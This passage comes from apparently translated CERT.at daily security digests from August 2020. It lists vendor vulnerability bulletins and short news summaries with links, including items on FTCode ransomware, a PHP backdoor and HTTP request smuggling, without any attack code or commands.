Many of our processes run through a ticket system, in our case RTIR. The time has now come to make a more radical change here: a new version (and of course a radically new one was promptly released during the test phase. Sigh.)
---------------------------------------------
https://cert.at/de/blog/2020/8/upgrade-unseres-ticketsystem-20200807
=====================
= Vulnerabilities =
=====================
∗∗∗ Security updates for Thursday ∗∗∗
---------------------------------------------
Security updates have been issued by Debian (clamav and json-c), Fedora (python2, python36, and python37), Red Hat (thunderbird), Scientific Linux (thunderbird), SUSE (java-11-openjdk, kernel, rubygem-actionview-4_2, wireshark, xen, and xrdp), and Ubuntu (openjdk-8 and ppp).
---------------------------------------------
https://lwn.net/Articles/828209/
∗∗∗ Security Bulletin: Multiple vulnerabilities in IBM Java SDK affect Content Collector for Email, Content Collector for File Systems, Content Collector for Microsoft SharePoint and Content Collector for IBM Connections ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-multiple-vulnerabilities-…
∗∗∗ Security Bulletin: WebSphere MQ Internet Pass-Thru – CVE-2020-2654 (deferred from Oracle Jan 2020 CPU) ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-websphere-mq-internet-pas…
∗∗∗ Security Bulletin: Embedded WebSphere Application Server is vulnerable to a command execution vulnerability affecting Content Collector for Email ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-embedded-websphere-applic…
∗∗∗ Security Bulletin: A vulnerability in IBM WebSphere Application Server affects IBM Spectrum Scale packaged in IBM Elastic Storage Server (CVE-2019-4720) ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-a-vulnerability-in-ibm-we…
∗∗∗ Security Bulletin: Content Collector for Email is affected by an embedded WebSphere Application Server that is vulnerable to an Information Disclosure vulnerability ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-content-collector-for-ema…
=====================
= End-of-Day report =
=====================
Timeframe: Wednesday 05-08-2020 18:00 − Thursday 06-08-2020 18:00
Handler: Dimitri Robl
Co-Handler: Robert Waldner
=====================
= News =
=====================
∗∗∗ Upcoming Security Updates for Adobe Acrobat and Reader (APSB20-48) ∗∗∗
---------------------------------------------
A prenotification security advisory (APSB20-48) has been posted regarding upcoming Adobe Acrobat and Reader updates scheduled for Tuesday, August 11, 2020.
---------------------------------------------
https://blogs.adobe.com/psirt/?p=1906
∗∗∗ Incident Response Analyst Report 2019 ∗∗∗
---------------------------------------------
As an incident response service provider, Kaspersky delivers a global service that results in global visibility of adversaries' cyber-incident tactics and techniques in the wild. In this report, we share our teams' conclusions and analysis based on incident responses and statistics from 2019.
---------------------------------------------
https://securelist.com/incident-response-analyst-report-2019/97974/
∗∗∗ A Fork of the FTCode Powershell Ransomware, (Thu, Aug 6th) ∗∗∗
---------------------------------------------
Yesterday, I found a new malicious Powershell script that deserved to be analyzed due to the way it was dropped on the victim's computer. As usual, the malware was delivered through a malicious Word document with a VBA macro. A first observation reveals that it's a fileless macro. The malicious Base64 code is stored in multiple environment variables that are concatenated then executed through an IEX command...
---------------------------------------------
https://isc.sans.edu/diary/rss/26434
∗∗∗ Ad Hoc Log Management in an Emergency (SEC Defence) ∗∗∗
---------------------------------------------
Many organizations that do not have their own incident response team have little or no visibility into their own corporate network. Yet especially for analysing and remediating an incident, it is essential to ensure adequate visibility on all systems.
---------------------------------------------
https://www.sec-consult.com/./blog/2020/07/ad-hoc-log-management-im-ernstfa…
∗∗∗ PHP Backdoor Obfuscated One Liner ∗∗∗
---------------------------------------------
In the past, I have explained how small one line PHP backdoors use obfuscation and strings of code in HTTP requests to pass attacker’s commands to backdoors. Today, I’ll highlight another similar injection example and describe some of the malicious behavior we’ve seen recently on compromised websites.
---------------------------------------------
https://blog.sucuri.net/2020/08/php-backdoor-obfuscated-one-liner.html
∗∗∗ Researcher Demonstrates 4 New Variants of HTTP Request Smuggling Attack ∗∗∗
---------------------------------------------
New research has identified four new variants of HTTP request smuggling attacks that work against various commercial off-the-shelf web servers and HTTP proxy servers. Amit Klein, VP of Security Research at SafeBreach, who presented the findings today at the Black Hat security conference, said that the attacks highlight how web servers and HTTP proxy servers are still susceptible to HTTP request smuggling even 15 years after they were first documented.
---------------------------------------------
https://thehackernews.com/2020/08/http-request-smuggling.html
∗∗∗ Macro malware for macOS: researcher warns of underestimated danger ∗∗∗
---------------------------------------------
An "Office Drama" is approaching for macOS users, fears Patrick Wardle. Macro malware could bypass protective measures, the researcher explained at Black Hat 2020.
---------------------------------------------
https://heise.de/-4864148
=====================
= Vulnerabilities =
=====================
∗∗∗ Cisco Security Advisories ∗∗∗
---------------------------------------------
Cisco has published 19 security advisories. None of the vulnerabilities is rated critical; four are rated "High".
---------------------------------------------
https://tools.cisco.com/security/center/Search.x?publicationTypeIDs=1&first…
∗∗∗ Security Bulletin: IBM MQ could allow an attacker to cause a denial of service due to a memory leak caused by an error creating a dynamic queue. (CVE-2020-4375) ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-ibm-mq-could-allow-an-att…
∗∗∗ Security Bulletin: IBM Java SDK and IBM Java Runtime for IBM i is affected by CVE-2020-2654 ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-ibm-java-sdk-and-ibm-java…
∗∗∗ Security Bulletin: IBM MQ is affected by a vulnerability within IBM WebSphere Liberty (CVE-2020-4329) ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-ibm-mq-is-affected-by-a-v…
∗∗∗ Security Bulletin: CVE-2020-2601 may affect IBM® SDK, Java™ Technology Edition ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-cve-2020-2601-may-affect-…
∗∗∗ Security Bulletin: IBM MQ is vulnerable to a buffer overflow vulnerability due to an error within the channel processing code (CVE-2020-4465) ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-ibm-mq-is-vulnerable-to-a…
∗∗∗ Security Bulletin: Vulnerability CVE-2019-2949 in IBM Java SDK and IBM Java Runtime affects IBM i ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-vulnerability-cve-2019-29…
∗∗∗ Security Bulletin: IBM MQ could allow an attacker to cause a denial of service caused by an error within the pubsub logic. (CVE-2020-4376) ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-ibm-mq-could-allow-an-att…
∗∗∗ Security Bulletin: A vulnerability in IBM Java Runtime affects IBM SPSS Statistics ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-a-vulnerability-in-ibm-ja…
∗∗∗ Security Bulletin: CVE-2020-2590 may affect IBM® SDK, Java™ Technology Edition ∗∗∗
---------------------------------------------
https://www.ibm.com/blogs/psirt/security-bulletin-cve-2020-2590-may-affect-…